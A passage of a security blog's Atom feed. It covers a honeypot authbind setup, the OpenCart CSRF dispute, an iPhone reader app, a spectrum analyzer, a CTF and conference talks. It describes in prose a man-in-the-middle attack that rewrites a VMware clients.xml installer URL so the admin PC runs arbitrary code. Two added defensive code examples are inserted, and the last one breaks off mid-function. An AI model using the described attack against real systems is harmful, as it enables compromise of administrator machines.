and cry, but I'll leave that for another post...<br /><br />BTW, I blame Andrew (<a href="http://twitter.com/Infosanity">@Infosanity</a>) for all of that - he got me back to honeypots topic, then other great tweeps came back with advice (much appreciated), so make sure to visit <a href="http://blog.infosanity.co.uk/category/honeypot/">his blog</a> ;-)
 ]]>
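        <![CDATA[Port 22 is privileged, and the post solves that with authbind: a file <tt>/etc/authbind/byport/22</tt> owned by the honeypot user and executable by it. The functions below are an added example, not code from the post or from kippo: <i>authbind_setup_port</i> repeats the touch/chown/chmod steps with input checks, and <i>authbind_allows</i> answers the question worth asking before you start the honeypot, namely whether the calling user may bind the port at all. The optional root-directory parameter exists only so both can be exercised against a scratch directory without root; authbind itself reads /etc/authbind. Function names are my own.<br /><br />
```sh
#!/bin/bash
# Added example, not from the original post: set up and verify the authbind
# permission for a low port, as the post does for kippo on port 22. The ROOT
# parameter defaults to /etc/authbind and is overridable only so the functions
# can be tested against a scratch directory. Function names are my own.

# authbind_setup_port USER PORT [ROOT]
# Creates ROOT/byport/PORT owned by USER with the execute bit set, which is
# what authbind checks before letting USER bind PORT. Normally needs root.
authbind_setup_port() {
    local user="$1" port="$2" root="${3:-/etc/authbind}"
    case "$port" in
        ''|*[!0-9]*) echo "port must be numeric: '$port'" >&2; return 1 ;;
    esac
    if [ "$port" -ge 1024 ]; then
        echo "port $port is not privileged; authbind is not needed" >&2
        return 1
    fi
    id "$user" >/dev/null 2>&1 || { echo "no such user: $user" >&2; return 1; }
    mkdir -p "$root/byport"
    : > "$root/byport/$port"          # same effect as the post's touch
    chown "$user" "$root/byport/$port"
    chmod 500 "$root/byport/$port"    # executable by the owner only
}

# authbind_allows PORT [ROOT]
# Returns 0 when the calling user may bind PORT through authbind, i.e. the
# byport file exists and is executable by that user (authbind's own test is
# access(X_OK) on that file as the real user).
authbind_allows() {
    local port="$1" root="${2:-/etc/authbind}"
    [ -x "$root/byport/$port" ]
}

# Exercise both functions against a scratch directory as the current user.
demo() {
    local root
    root=$(mktemp -d)
    authbind_setup_port "$(id -un)" 22 "$root"
    if authbind_allows 22 "$root"; then
        echo "authbind would let $(id -un) bind port 22 (under $root)"
    fi
    if ! authbind_allows 2222 "$root"; then
        echo "no byport file for 2222, so it would be refused (not needed anyway)"
    fi
    rm -rf "$root"
}

demo
```
<br />On the honeypot host you would run <i>authbind_setup_port honeytrap 22</i> as root once, then check with <i>authbind_allows 22</i> as the honeytrap user before adding <tt>authbind</tt> in front of the start command.<br />]]>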
    </content>
</entry>

<entry>
    <title>Coder vs Security - friend or foe?</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2010/05/coder-vs-security-friend-or-foe.html" />
    <id>tag:www.ctrl-alt-del.cc,2010://1.37</id>

    <published>2010-05-25T10:45:22Z</published>
    <updated>2010-05-25T10:55:38Z</updated>

    <summary>Certainly 140 characters is not enough to express all the thoughts around recent CSRF flaw in OpenCart and how it was handled (in my humble opinion it even deserves nomination for Pwnie Awards), although some people had a good go...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="software" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="awareness" label="awareness" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="csrf" label="CSRF" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="opencart" label="OpenCart" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Certainly 140 characters is not enough to express all the thoughts around recent CSRF flaw in OpenCart and how it was handled (in my humble opinion it even deserves nomination for <a href="http://pwnies.com/nominations/">Pwnie Awards</a>), although some people had a good go at Daniel Kerr.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="twitroll-ocart-fail.png" src="http://www.ctrl-alt-del.cc/2010/05/25/ocart-fail.png" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="328" width="560" /></span>Above is just a selection of comments that you can find on Twitter and in all of this negative karma there is some good thing going on. This incident got quite a lot of people to write some really good posts about the incident. Some of my favorite posts are <a href="http://coffeetocode.net/2010/05/humble-helps/">Humble Helps</a> and <a href="http://h20597.www2.hp.com/securitysoftware/blogs/rafal/archive/2010/05/24/psychology-of-quot-secure-code-quot.aspx">Psychology of "Secure Code"</a> - definitely worth reading.<br /><br />Although I'm not an expert in either coding or security (but I did quite a lot of both) I think there is also a bit more to it.<br />]]>
        <![CDATA[I used to work with many coders (people that write code) - some
extremely good and some extremely bad. When I look back I would happily
say that I was at some point doing a bit of both - at least in my own
opinion.<br /><br /><font style="font-size: 1.25em;"><b>Developers vs code-slingers</b></font><br /><br />There
is a significant distinction between those two groups at least as far
as I can tell. Developers do their job and write apps the best way they
can, they are proud of their job because they know they did the best
they could. Code-slingers, well... get it done, whatever... Usability is
something they may or may not understand (if it works, it's usable,
right?), quality and elegance rings the bell somewhere but that's not
in their church so nothing to worry about... and security is often
totally unheard of. Sad, isn't it?<br /><br />I think we've all been there
and done more or less of that - it takes time to learn and even more
time to understand. That requires patience and a lot of energy, and
more than anything it requires a person to say "<i>I want to do it right, I want to understand</i>".<br /><br />Recently in one of the emails I've found an anonymous quote by a person that was training newly hired staff - he said "<i>I can teach them just about anything, but I can't give them a basic<br />sense of curiosity</i>". I couldn't describe it better!<br /><br /><font style="font-size: 1.25em;"><b>Developers vs Infosec</b></font><br /><br />In
my opinion the real virtue of a good developer is aiming for perfection
and taking criticism as a chance to improve. It is sometimes painful (I
know from my own experience) but we all make mistakes and no matter how
good we are, there will be someone better that will prove we are wrong.
Real developers know how to deal with it because they want their code
to be beautiful in all possible aspects and they are curious people.
Some of those can be real inspiration and you enjoy every second you
spend with them.<br /><br /><font style="font-size: 1.25em;"><b>Code-slingers vs Infosec</b></font><br /><br />Mostly
not as skilled as developers, often with bad habits, etc - you can say
'developers in training' and that is ok. The first shock of getting
something that actually does the job is hopefully passing by and they
want more - or they don't...&nbsp; they are so happy that their code works
that nothing else matters - that's where the problems come from.<br /><br />It's
not a problem of skill, it's a problem of attitude. You can spend a lot
of time with them trying to explain, demonstrate or even send them to some
training that deals with secure coding... still they couldn't care less -
oblivious, ignorant, often arrogant and portraying you (the infosec
person) as their biggest enemy because you prevent them from doing
their job. Yes, I've been there and worked with such people.<br /><br /><font style="font-size: 1.25em;"><b>Free vs 'for money'</b></font><br /><br />Your
options vary depending on the environment. In the 'for money' space you have
tools to deal with that - you can and should mentor such people to help
them understand. Sometimes a cup of coffee or a friendly chat at the
whiteboard going through the requirements and proposed solutions or
ideas can really make a huge difference. If you are not so friendly then
get your company to pay for some good training that will give those
people a good base to do their work (get rid of bad habits, don't
post code snippets on a forum with the URL to the product, etc) so they get
the carrot. <br />If that doesn't help, go for the stick - at the end of
the day, that code-slinger or his/her supervisor or their supervisor
will have to face the dilemma of signing off code for production - it's
a business decision. If you can't block it and don't communicate your
security concerns it will be your fault if things go wrong and your
head on the chopping block. Brutal but simple - isn't it?<br /><br />In the
free software world, where a coder does something for little money (let's
say donations) or no money at all, what is the carrot and what is the
stick? If people care, they get good ratings, maybe more donations,
good publicity and are praised for their work, but if they don't give a
s**t... Oh, hi Daniel!<br /><br />Free software users will complain, do a lot
of bad PR and a lot of them will go away, migrating to other products,
but hold on... in this particular case THERE IS commercial support
for OpenCart. What will the paid customers do with a response like the one
we've seen? How do they feel? They pay for support that they clearly
don't get :-(<br /><br /><font style="font-size: 1.25em;"><b>Lessons to take away</b></font><br /><br /><font style="font-size: 1em;">If you are a so-called code-slinger,</font>
try to understand that writing code that works is not all you have to
do. You should create solutions - not problems. Don't behave like a
little kid, put your pride aside for a few minutes and listen to what
people have to say about your work - it really helps, even if it will
ruin your day.<br /><br />If you are a developer, please be a mentor to the
code-slingers so they understand the beauty of the code and what it is
all about. Be a role model - calm, patient, their best friend and
inspiration - that's how miracles happen.<br /><br />If you are the infosec
person, please remember that saying 'no, you're doing it wrong' doesn't get
you anywhere. You have to be patient more than ever, explain why you
said 'no' and help find a solution - otherwise you have just created
another problem.<br /><br />Whoever you are - remember that people
sometimes get frustrated, they have a bad day, they say things they
later regret - it's a design flaw we all have.&nbsp; Daniel has just
demonstrated it and it went public. A simple 'sorry' can clear the
atmosphere and create a place to work together and solve the problem. &nbsp;<br /><br /><br />At the end of the day, we should all be friends, not foes... so I'd better shut up before I say something I will regret :-)<br /><br /><br />]]>
    </content>
</entry>

<entry>
    <title>RTFM - there&apos;s and app for that</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2010/03/rtfm-theres-and-app-for-that.html" />
    <id>tag:www.ctrl-alt-del.cc,2010://1.36</id>

    <published>2010-03-24T14:31:06Z</published>
    <updated>2010-03-24T15:08:39Z</updated>

    <summary>What can be better to do on the tube than to kill some time reading manuals or books? Of course in IT quite a lot of that stuff comes as PDFs or other non-paper formats, so good eBook reader or...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="software" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="iphone" label="iPhone" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="rtfm" label="RTFM" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[What can be better to do on the tube than to kill some time reading manuals or books? Of course in IT quite a lot of that stuff comes as PDFs or other non-paper formats, so a good eBook reader or an app for whatever terminal you have is an advantage.<br /><br />During one of the <a href="http://www.dc4420.org/">DC4420</a> meetings one of the guys gave a very good recommendation for an iPhone app that copes very well with PDFs and some other formats. The app is called <a href="http://goodreader.net/goodreader.html">Good Reader</a> and I have to say, it's really good (for what I need it to do).<br /><br />Usually the problem is how to deliver the files of interest to the reader. You want to be able to read when off-line and have flexibility in delivery methods of course. Here is the thing that sold me on Good Reader - you can upload the files over wifi directly to the iPhone, using nothing more than a web browser. Yes - the app functions as a web server to do it! Just to make sure it doesn't turn your phone into a public web server, you have to confirm that you want to allow the given IP to connect and you get that question every time you turn the wifi upload option on.<br /><br /><center><span><img alt="01-wifi-ready.jpg" src="http://www.ctrl-alt-del.cc/2010/03/24/01-wifi-ready.jpg" style="margin: 0pt auto 20px; padding: 5px; text-align: center;" width="320" height="480" /></span><span><img alt="02-conn_request.jpg" src="http://www.ctrl-alt-del.cc/2010/03/24/02-incomming.jpg" style="margin: 0pt auto 20px; padding: 5px; text-align: center;" width="320" height="480" /></span></center>]]>
        <![CDATA[The web interface is very simple and does what it says - you can create directories and upload files - that's all you really need.<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="03-webview.png" src="http://www.ctrl-alt-del.cc/2010/03/24/03-webview.png" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" width="640" height="465" /></span>
This is of course just the local method of doing it and it's not all of what Good Reader can do to get the content for you. A nice feature is that you can save a web page using the Download option or connect to another server to get your files and here's another nice thing... you get a selection of popular e-mail providers, general POP/IMAP access, iDisk, Google Docs, Dropbox, WebDAV, FTP and others. To be fair - that looks very good!
<br /><br /><center><span><img alt="06-servers.jpg" src="http://www.ctrl-alt-del.cc/2010/03/24/06-servers.jpg" style="margin: 0pt auto 20px; padding: 5px; text-align: center;" width="320" height="480" /></span><span><img alt="05-reflow.jpg" src="http://www.ctrl-alt-del.cc/2010/03/24/05-reflow.jpg" style="margin: 0pt auto 20px; padding: 5px; text-align: center;" width="320" height="480" /></span></center>Last but not least - the 'reflow' option (above) is brilliant - it reformats text into your standard font, bigger and easier on the eyes. That messes up some of the documents a bit, but then with one touch you can jump back to normal view and all looks well again. Important note - there is no problem with embedded images, graphs, diagrams, etc. They are all displayed exactly as they should be and that's really important for technical stuff. If you use large documents you should like this one - I didn't notice significant delays in viewing huge PDFs (some having 800+ pages and weighing 50+ MB). <br /><br />I think I've finally found an app for proper RTFM on the move and it came at the very reasonable price of £0.59.
]]>
    </content>
</entry>

<entry>
    <title>AirView2 Spectrum Analyzer</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/12/airview2-spectrum-analyzer.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.35</id>

    <published>2009-12-15T22:42:13Z</published>
    <updated>2009-12-16T01:33:16Z</updated>

    <summary>Recently I had some serious problems with wi-fi at home - especially one of the laptops was dropping off and couldn&apos;t come back. Quick survey using Kismet and other tools to scan what&apos;s flying around has proven that my network...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="hardware" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="networking" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="software" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="solutions" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="java" label="Java" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="osx" label="OS X" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Recently I had some serious problems with wi-fi at home - especially one of the laptops was dropping off and couldn't come back. A quick survey using Kismet and other tools to scan what's flying around has proven that my network is in a less populated part of the spectrum (at least here) but still, problems are getting worse and worse.<br /><br />I was fully aware of <a href="http://www.metageek.net/">Wi-Spy by Metageek</a>, had seen it in action previously but never had a chance to buy one. Part of the decision was the price back then, maybe now it would be another game, but anyway - I got myself another device, made by well known wi-fi vendor <a href="http://ubnt.com/">Ubiquiti</a> and it's called <a href="http://ubnt.com/airview/">AirView2</a>.<br /><br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="AirView2-EXT" src="http://www.ctrl-alt-del.cc/2009/12/16/AirView2ext-osx.png" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="387" width="640" /></span><br /><b>What's so special about this one? Why is it better than Wi-Spy?</b><br /><br />First of all I didn't say it's better. It's different, works with Linux, Mac OS X and Windows, has a nice price tag and does pretty much the same as Wi-Spy. Let's have a closer look then, shall we?<br />]]>
        <![CDATA[<b>It's different</b><br /><br />Well, obviously it is... it comes from a different vendor... and this post is not a sales pitch - it's just what I've experienced myself. On a bit more serious note, it's smaller than all the Wi-Spy models I've seen so far. Smaller is good, right? Yes - takes up less space, No - easier to lose (looks almost like a USB stick).<br /><br /><b>Works with Linux, Mac and Windows</b><br /><br />Yes, it does... better or worse but it does and it's not a matter of hardware or bundled software, but clearly it depends on the host OS and Java. You got it right - Java!<br />The software is written in Java to be really cross platform, but those that are not Java developers but use it a bit know quite well what a pain in the rear Java can be. Same here - Ubiquiti warns about compatibility issues, there are long posts on the forums about why this particular version of the AirView software doesn't work (mostly on Mac OS X) and how to fix it, etc.<br /><br /><i>Windows</i> - OK, even inside a VM with USB passed through to the guest VM (tested VirtualBox, VMWare Workstation and Fusion - all with Windows 7 and latest Java). It was all very slow, losing connection with the device and re-initializing it all the time, but it worked. In native mode with Windows 7 on a bare metal box it worked like a charm (tested on a netbook PC).<br /><br /><i>Linux</i> - didn't try, not enough time - sorry.<br /><i><br />Mac OS X</i> - yeah... that sucked! If you have the latest patches installed most likely the software will hang on detecting the device. 
Of course the reason is Java + OS X (I'm on 10.6.2 as of now with Java 1.6.0_17 in 64-bit mode).<br /><br /><blockquote><i>java.lang.UnsatisfiedLinkError: /Library/Java/Extensions/librxtxSerial.jnilib:&nbsp; no suitable image found.&nbsp; Did find:&nbsp; /Library/Java/Extensions/librxtxSerial.jnilib: no matching architecture in universal wrapper thrown while loading gnu.io.RXTXCommDriver<br /><br />Exception in thread "AirViewer-Initializer" java.lang.UnsatisfiedLinkError: /Library/Java/Extensions/librxtxSerial.jnilib:&nbsp; no suitable image found.&nbsp; Did find:&nbsp; /Library/Java/Extensions/librxtxSerial.jnilib: no matching architecture in universal wrapper</i><br /></blockquote>WTF?! File not found... but found? (The library is there, it just doesn't contain a build for the architecture the JVM is running in - 64-bit here.) Never mind - luckily the solution is very simple - AirView comes with its own version of <i>librxtxSerial.jnilib</i> so the one that came with OS X needs to be disabled temporarily and the problem will go away. That can be done very easily with one command in the terminal:<br /><br /><blockquote><i>mv /Library/Java/Extensions/librxtxSerial.jnilib{,-disabled}</i><br /></blockquote>That's it, now it works :-)<br /><br /><b>Price tag</b><br /><br />This argument is obviously quite important. Is it that much cheaper? I'm not so sure... of course you can get the basic Wi-Spy for about £65+VAT so even if AirView2 were equal to it in hardware terms, it would cost a bit more - £69+VAT... There is one catch to it though - AirView2 comes in several versions. I bought the AirView2-EXT for £64+VAT and this one has an MMCX connector for an external antenna (because it doesn't have a built-in one) and comes with a clip-on omnidirectional antenna (~3-5dBi I guess) in the package. To buy Wi-Spy with an RP-SMA connector you would have to spend at least £120+VAT which is almost double the price of AirView2-EXT.<br /><br />HINT: Wi-Spy with RP-SMA is 2nd generation - faster with better scan resolution than the first generation of the device. 
So far I didn't have enough time to grab the full spec for AirView2 and compare them side by side - that would be very interesting (it's already on my TODO list).<br /><br /><b>Does it do the same stuff?</b><br /><br />I would say YES based on what I can see, but as most of those devices are SDRs (Software Defined Radio), they can do all the software allows them to do and I didn't have a chance to compare the recent version of the Wi-Spy software to the AirView one, so please take my words here with a grain of salt and look for other sources to confirm that.<br /><br /><b>Conclusions</b><br /><br />The device worked for me like a charm - it turned out that the signal from my AP was attenuated by temporary objects that came in the way (books - whole piles of them) and as the number of networks around at least doubled in the last 12 months, somebody put up some very messy device that is transmitting all the time with a very wide signal, exactly in the area of the channel I was on - so here comes the interference!<br />A quick look at the graphs and it was clear that a simple channel change should cut down on the interference and moving the books a bit will improve signal strength in the place where this unlucky laptop is used most of the time - it worked very well, no more problems!<br /><br />Looking at the bottom line, for me that's money very well spent! I was asking myself 'how often will I use this thing' and now I really appreciate the power of seeing something that Kismet and similar tools won't see. <br /><br />Using a spectrum analyzer like AirView or Wi-Spy (doesn't really matter which one - pick one that suits your needs) is like reading between the lines - there is a lot of valuable information out there... if only you can see it!<br />]]>
    </content>
</entry>

<entry>
    <title>The Hex Factor at SANS London 2009</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/12/the-hex-factor-at-sans-london-2009.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.34</id>

    <published>2009-12-05T09:32:23Z</published>
    <updated>2009-12-06T20:35:29Z</updated>

    <summary>The competition is now officially over and I have to say it was AWESOME!Those that made it to BruCON had a chance to play it, those that came to SANS London 2009 also had their fun, all the rest of...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="conferences" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="sans" label="SANS" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="thehexfactor" label="The Hex Factor" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[The competition is now officially over and I have to say it was AWESOME!<br /><br />Those that made it to <a href="http://www.brucon.org/">BruCON</a> had a chance to play it, those that came to <a href="http://www.sans.org/london09/">SANS London 2009 </a>also had their fun, all the rest of you - bad luck :-/ maybe next time.<br /><br />The Hex Factor was run for four evenings/nights at <a href="http://foxbars.com/excel/index.html">The Fox</a> Bar and Restaurant located literally next to the Excel center where the SANS courses were hosted. What can be better than beer, hacking and a spirit of competition?!<br /><br />Tasks set by the authors varied in difficulty and in the topics they covered. One category was about the history and culture of hacking with a bit of general teaser tasks and was called <b>Once Upon A Time</b>, like finding the name of a candy shop at &lt;street name&gt;, so that was a soft introduction.<br /><br />My favorite category was the <b>Out Of The Box</b> category (also known as <b>Pure Leetness</b>), where questions were really 'out of the box' and solving them was the best fun I had for a long time! The first 100 points for finding a number 'hidden' in the message was really simple and <a href="http://www.youtube.com/watch?v=qkLClG0FBBw">here's how I did it</a>:<br /><br /><center><object height="480" width="640"><param name="movie" value="http://www.youtube.com/v/qkLClG0FBBw&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/qkLClG0FBBw&amp;hl=en_US&amp;fs=1&amp;rel=0&amp;hd=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="480" width="640"></embed></object></center><br /><br />I didn't have time to do the one for 200 points, but finally after some time I managed to solve the 300 points one - finding a secret number hidden in a PDF file - hats off to Didier Stevens for this task - it was amazing! <a href="http://blog.didierstevens.com/">Didier's blog</a> was a great guide and help in the process.<br /> ]]>
        <![CDATA[The third category was <b>Pwned</b> and consisted of a physical box with
sensors you had to trigger in the right order to get the code and two
systems to be penetrated. As I said, the difficulty varied and so
did the nominal point values for each task, from 100 to 300, but you
could also get partial points if you did only part of the task
properly. Of course during a competition like this one you are never alone... Hello brotha!<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="hexfactorhello.jpg" src="http://www.ctrl-alt-del.cc/2009/12/06/hexfactorhello.jpg" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="450" width="600" /></span><br />Anyway, it was all a very very friendly competition - beer infused with brains hurting after the classes (typical for 'SANS Fire Hose Syndrome'). <br /><br />The fourth category of tasks was <b>Binary fu</b> where you had to work your way through programs delivered as .exe files and get the secret codes out of them. The first one was easy, but again I had no time to go through the remaining two. That is the reason why our team (I was working with <a href="http://blog.c22.cc/">Chris Riley</a>, better known as <a href="http://twitter.com/ChrisJohnRiley">@ChrisJohnRiley</a>) was called <i>Drunk and going home</i>. <br /><br />At the end we were #4 on <a href="http://www.thehexfactor.org/home/2009_sanslondon">the leader board</a> but as it turned out, two teams of the first three were the same people, so in a way we are #3, so here we are - two of the three winning teams, already in The Hex Factor t-shirts!<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="hexfactorwinners.jpg" src="http://www.ctrl-alt-del.cc/2009/12/06/hexfactorwinners.jpg" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="450" width="600" /></span><br />I'd like to say <b>THANK YOU</b> to all the people behind The Hex Factor - it was a really awesome experience and great fun, so I hope it's not the last time we see The Hex Factor. See you next time!<br />]]>
    </content>
</entry>

<entry>
    <title>CONFidence09.02 - post mortem</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/11/confidence0902-post-mortem.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.33</id>

    <published>2009-11-28T09:45:34Z</published>
    <updated>2009-11-28T13:49:09Z</updated>

    <summary>Well... my plan to blog live from the CONFidence was good but still remained to be more of a plan than a reality. Twitting went much better (possibly because you can twitt between chats with people, drinks, etc) so I&apos;ll...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="conferences" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="confidence" label="CONFidence" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Well... my plan to blog live from CONFidence was good but still remained more of a plan than a reality. Tweeting went much better (possibly because you can tweet between chats with people, drinks, etc) so I'll wrap up what happened and how it went.<br /><br />The conference was great - I really liked the lectures (those I actually made it to), loved the chats with speakers and it was awesome to meet some old friends and make some new contacts. Overall, if you didn't come to Warsaw for CONFidence09.02 you missed quite a lot.<br /><br /><b>Day 1 summary</b><br />There was a very nice presentation by Felix "FX" Lindner on how 'awesome' Cisco IOS is, Claudio Criscione (<a href="http://twitter.com/paradoxengine">@paradoxengine</a>) talked about security in virtualization environments, Frank Breedijk renamed his AutoNessus to <a href="http://seccubus.org/">Seccubus</a> (new twitter feed at <a href="http://twitter.com/seccubus">@seccubus</a>), Leonardo NVE Egea showed us how you can use satellites as your downlink (and it seemed much easier than you would actually think), Pavol Luptak pretty much owned the RFID there (yes, the basic cloning kit is just €30), Elisa dropped the pressure a bit with Power Point Karaoke where Felix "FX" Lindner was presenting about detecting unknown alcohols, Raoul Chiesa gave a great presentation about knitting (yes, knitting) and I was rolled into a presentation about IT slang/acronyms and there was something about insulting someone :-) and that was just the first day.<br /><br /><b>Day 2 summary</b><br />For those that survived the 'afterparty' on the evening/night/morning you had a chance to see a nice explanation of the cold boot attack given by Nadia Heninger, Nick DePetrillo discussed 'what could go wrong' with intelligent power grids and believe me... there's a lot! Jacob Appelbaum (<a href="http://twitter.com/ioerror">@ioerror</a>) gave us some TOR love and a lot of TOR laptop stickers. 
Alessio "mayhem" Penasilico (<a href="http://twitter.com/mayhemspp">@mayhemspp</a>) and Raoul Chiesa gave a nice presentation on the history of hacking telcos - there was some good info there... just before Raoul killed it all with the final presentation dissecting the underground economy (with some slides shown just after the cameras and other recording equipment were turned off). That was a really good one...<br /><br />Finishing off, Frank has posted a bunch of posts about the presentations we saw in Warsaw. They are:<br /><ul><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence0902-threat-feeds/">Fusing 3rd party threat feeds to obtain better threat intelligence - Eddie Schwartz</a></li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence0902-router-exploitation/">Router Exploitation - Felix "FX" Lindner</a></li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-seccubus-slides/">My Seccubus slide deck</a> (slides from Frank's presentation)</li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-tls-renegotiation/">My TLS renegotiation vulnerability slides</a> (Frank's lightning talk during one of the breaks)</li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-mifare/">Mifare Classic analysis - Pavol Luptak</a></li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-power-hungy-people-%e2%80%93-nick-depetrillo/">Power Hungy People - Nick DePetrillo</a></li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-tor/">The Tor Project - Jacob Appelbaum</a></li><li><a href="http://www.cupfighter.net/index.php/2009/11/confidence-cybercrime/">Underground economy - Raoul Chiesa</a><br /></li></ul><br />That's it for now - just make sure you get there next time :P<br />]]>
        
    </content>
</entry>

<entry>
    <title>Claudio Criscione - Virtualization security</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/11/claudio-criscione-virtualization-security.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.31</id>

    <published>2009-11-19T16:11:17Z</published>
    <updated>2009-11-19T16:27:49Z</updated>

    <summary>Claudio gave today brilliant presentation about virtualization security... Just a few bullet points from the presentation.It turned out that VMWare hypervisor is running Tomcat to give you the admin interface - oldie (shall I read it &apos;unpatched&apos;) but goldie, right?You...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="conferences" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="virtualization" label="virtualization" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Claudio gave a brilliant presentation about virtualization security today... Just a few bullet points from the presentation.<br /><br /><ul><li>It turned out that the VMWare hypervisor is running Tomcat to give you the admin interface - oldie (shall I read it 'unpatched') but goldie, right?</li><li>You can do MiTM against the VMWare VI Client... and as presented in the demo, that works like a charm, plus...</li><li>... if you can MiTM you can pwn the box - clients.xml that is served by the server contains a URL of the client .exe to be executed - boom, you can change that!</li></ul>Just to give you the idea - during the live demo Claudio forced the admin PC (the one running VI Client) to format drive C: and there was no option to stop it, it pretty much kicked off right away. <br /><br />There was much more than that - Xen and Ubuntu also got their share here but the practical demo was based on VMWare.<br /><br />Lessons learned?<br />Treat VM hosts and their apps just as another computer, another system and make sure you secure them the same way as any other system. Think of patch management and what happens when you revert to a snapshot (it may be old and unpatched so you bring back an unpatched or already compromised system), think of separation of duties and access (physical and logical).<br /> ]]>
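        <![CDATA[<br />Added example, not from Claudio's talk and not VMware's code: the kind of check an admin workstation could apply before running an installer named in a server-supplied descriptor like clients.xml - HTTPS only, host on a local allowlist, and the download compared against a hash pinned locally rather than one carried in the descriptor. The XML layout, host names and installer bytes below are constructed stand-ins, not VMware's real schema or binaries.<br />

```python
import hashlib
import hmac
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed stand-in for the descriptor the client fetches from the server.
# It is NOT VMware's real clients.xml schema, only the one field that matters
# for this check: the URL of the executable the client will download and run.
SAMPLE_CLIENTS_XML = """<?xml version="1.0"?>
<ConfigRoot>
  <clientConnection id="0000">
    <url>https://vcenter.example.internal/client/VMware-viclient.exe</url>
  </clientConnection>
</ConfigRoot>
"""

# Constructed bytes standing in for the real installer.
SAMPLE_INSTALLER = b"MZ\x90\x00 constructed installer bytes, not a real PE"

# Policy lives on the admin workstation, never inside the downloaded
# descriptor: if the descriptor could carry its own hash or allowlist, the
# same on-path attacker who rewrites the URL would rewrite those too.
ALLOWED_HOSTS = {"vcenter.example.internal"}
PINNED_SHA256 = {
    "VMware-viclient.exe": hashlib.sha256(SAMPLE_INSTALLER).hexdigest(),
}


def extract_installer_url(descriptor_xml):
    """Return the installer URL named in the descriptor, or None if absent."""
    root = ET.fromstring(descriptor_xml)
    node = root.find("./clientConnection/url")
    if node is None or not node.text:
        return None
    return node.text.strip()


def url_is_acceptable(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only https, a host on the allowlist and an .exe path."""
    parts = urlparse(url)
    return (
        parts.scheme == "https"
        and parts.hostname in allowed_hosts
        and parts.path.lower().endswith(".exe")
    )


def verify_installer(descriptor_xml, installer_bytes,
                     allowed_hosts=ALLOWED_HOSTS, pinned=PINNED_SHA256):
    """Decide whether the installer named by the descriptor may be run.

    Returns (ok, reason); every rejection names the control that failed so
    the event can be logged and investigated rather than silently retried.
    """
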